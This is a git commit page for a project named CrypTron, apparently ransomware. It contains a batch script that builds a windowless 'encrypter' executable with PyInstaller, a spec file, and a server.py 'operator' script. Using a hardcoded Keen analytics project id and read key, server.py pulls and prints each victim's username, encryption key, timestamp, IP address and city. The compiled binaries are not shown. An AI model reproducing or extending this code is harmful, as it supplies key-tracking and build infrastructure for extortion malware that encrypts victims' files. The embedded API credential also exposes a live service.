initial commit
This commit is contained in:
commit
a04ab2b152
2
.gitignore
vendored
Normal file
2
.gitignore
vendored
Normal file
@ -0,0 +1,2 @@
|
||||
build/*
|
||||
build/
|
6
compile.bat
Normal file
6
compile.bat
Normal file
@ -0,0 +1,6 @@
|
||||
title compiling encrypter...
|
||||
|
||||
::Normal Mode:
|
||||
set /p var="Debug? [y/n]> "
|
||||
if %var%==n pyinstaller test.py -F -w -i icon.ico
|
||||
if %var%==y pyinstaller test.py -F -i icon.ico
|
BIN
dist/test.exe
vendored
Normal file
BIN
dist/test.exe
vendored
Normal file
Binary file not shown.
BIN
dist/test64.exe
vendored
Normal file
BIN
dist/test64.exe
vendored
Normal file
Binary file not shown.
62
server.py
Normal file
62
server.py
Normal file
@ -0,0 +1,62 @@
|
||||
import os
|
||||
|
||||
# -2 Zeitzone
|
||||
|
||||
# 7.50
|
||||
os.system("title [CrypTron Server]")
|
||||
os.system("cls")
|
||||
print """
|
||||
|
||||
|
||||
.--------.
|
||||
/ .------. \\
|
||||
/ / \\ \\
|
||||
| | | |
|
||||
_| |________| |_
|
||||
.' |_| |_| '.
|
||||
'._____ ____ _____.'
|
||||
| .'____'. |
|
||||
'.__.'.' '.'.__.'
|
||||
'.__ |Crypto| __.'
|
||||
| '.'.____.'.' |
|
||||
'.____'.____.'____.'
|
||||
'.________________.'"""
|
||||
|
||||
import keen
|
||||
import time
|
||||
import hashlib
|
||||
|
||||
keen.project_id = "57b37f2f80a7bd714c4f66d0"
|
||||
keen.read_key = "bb663a560ee0c82d6dac5531108e1376416efd1f34b36993451b96bd4c518909cea4a415c6d16d1e9945c94e866fcfdb4ae532dbf2d0391f0a06ae9f05e9bdb4de4adb9575158b04db116ef7ac54f3447b032a39807e3859c8c2fef40027dc8c"
|
||||
x = keen.extraction("key",timeframe="this_year")
|
||||
|
||||
time.sleep(0.5)
|
||||
os.system("cls")
|
||||
print """
|
||||
.--------.
|
||||
/ .------. \\
|
||||
/ / \\ \\
|
||||
| | | |
|
||||
| | | |
|
||||
| | |_|
|
||||
_| |____________
|
||||
.' |_| # '.
|
||||
'._____ ____ _____.'
|
||||
| .'____'. |
|
||||
'.__.'.' '.'.__.'
|
||||
'.__ |Crypto| __.'
|
||||
| '.'.____.'.' |
|
||||
'.____'.____.'____.'
|
||||
'.________________.'
|
||||
[CryptTron Server]
|
||||
"""
|
||||
|
||||
time.sleep(0.5)
|
||||
|
||||
for i in range(len(x)):
|
||||
try:
|
||||
print(" [*] User: "+x[i]["username"] + " - Key : "+x[i]["key"]+" - Encrypted on "+x[i]["keen"]["timestamp"].split("T")[0]+" at "+x[i]["keen"]["timestamp"].split("T")[1].split(".")[0]+" - IP: "+x[i]["ip_address"]+" - Location: [Country: "+str(x[i]["ip_geo_info"]["country"])+" | City: "+str(x[i]["ip_geo_info"]["city"])+"]")
|
||||
except:
|
||||
print(" [*] User: "+x[i]["username"] + " - Key : "+x[i]["key"]+" - Encrypted on "+x[i]["keen"]["timestamp"].split("T")[0]+" at "+x[i]["keen"]["timestamp"].split("T")[1].split(".")[0])
|
||||
|
||||
time.sleep(0.1)
|
28
test.spec
Normal file
28
test.spec
Normal file
@ -0,0 +1,28 @@
|
||||
# -*- mode: python -*-
|
||||
|
||||
block_cipher = None
|
||||
|
||||
|
||||
a = Analysis(['test.py'],
|
||||
pathex=['C:\\Users\\Dodox\\Desktop\\Projects\\CrypTron\\2.1'],
|
||||
binaries=[],
|
||||
datas=[],
|
||||
hiddenimports=[],
|
||||
hookspath=[],
|
||||
runtime_hooks=[],
|
||||
excludes=[],
|
||||
win_no_prefer_redirects=False,
|
||||
win_private_assemblies=False,
|
||||
cipher=block_cipher)
|
||||
pyz = PYZ(a.pure, a.zipped_data,
|
||||
cipher=block_cipher)
|
||||
exe = EXE(pyz,
|
||||
a.scripts,
|
||||
a.binaries,
|
||||
a.zipfiles,
|
||||
a.datas,
|
||||
name='test',
|
||||
debug=False,
|
||||
strip=False,
|
||||
upx=True,
|
||||
console=False , icon='icon.ico')
|
Loading…
Reference in New Issue
Block a user